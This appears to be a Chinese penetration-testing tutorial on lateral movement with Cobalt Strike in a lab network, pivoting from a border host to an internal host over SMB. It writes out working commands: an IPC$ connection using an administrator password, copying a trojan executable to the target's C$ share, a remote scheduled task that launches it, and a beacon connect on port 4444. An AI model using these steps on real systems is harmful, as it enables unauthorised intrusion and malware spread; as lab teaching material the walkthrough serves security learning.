【CS上线边界机器】-【内网渗透】-【横向移动】
环境准备:
CS vps server:139.xx.xx.32
CS 客户端:192.168.20.7
靶机128:192.168.157.128 (边界机器 server)
靶机3:192.168.157.133(不出网机器,双网卡)
PS:站在上帝视角进行测试
攻击拓扑图:
前提条件:
PC连接简述(445端口共享链接)
IPC 共享命名管道,连接445端口,提供账户密码后,可以进行默认文件共享及资源管理
139 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务
1. 开放139 445(SMB) 端口 (默认)
2. 目标开启 IPC 共享服务 (默认)
3. 要有管理员账户密码 (默认)
利用IPC+schtasks(写计划任务上线beacon)
1.先创建木马让PC28上线
创建监听:
生成木马:
木马直接复制到PC28 运行上线
木马上线
设置回连间隔,不然执行命令很慢
对网段192.168.157.0网段进行扫描
靶机128server服务器上线之后,通过128服务器做跳板,扫描同网段的机器是否存在135、445端口(默认是开启的)
尝试获取administrator密码(运维人员为了方便可能多台密码都是一样的,先获取128的密码)
利用边界机器PC128 建立与 PC133 192.168.157.133的IPC连接,建立IPC通道传输文件使用
shell net use \192.168.157.133 /user:administrator "YUxxx123."
查看建立的连接
shell net use
创建正向监听
生成正向监听的木马
将生成的木马上传到128服务器
查看上传的木马
使用IPC通道传输木马文件(从PC128上传到PC133)
shell copy ppp.exe \192.168.157.133c$
使用命令行赋予权限,通过命令指定木马通过PC28 和 PC133 建立连接
shell schtasks /create /s 192.168.157.133 /sc MINUTE /tn sectest /tr "C:ppp.exe"
正向shell 需要攻击机连接靶机 这里只有PC1与PC2建立交互 需要在PC1的beacon中建立和PC2的连接
connect 192.168.157.133 4444
上线:如下图
计划任务删除
schtasks /delete /s 192.168.157.133 /tn sectest /f
原文始发于微信公众号(海底生残月):【CS上线边界机器】-【内网渗透】-【横向移动】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论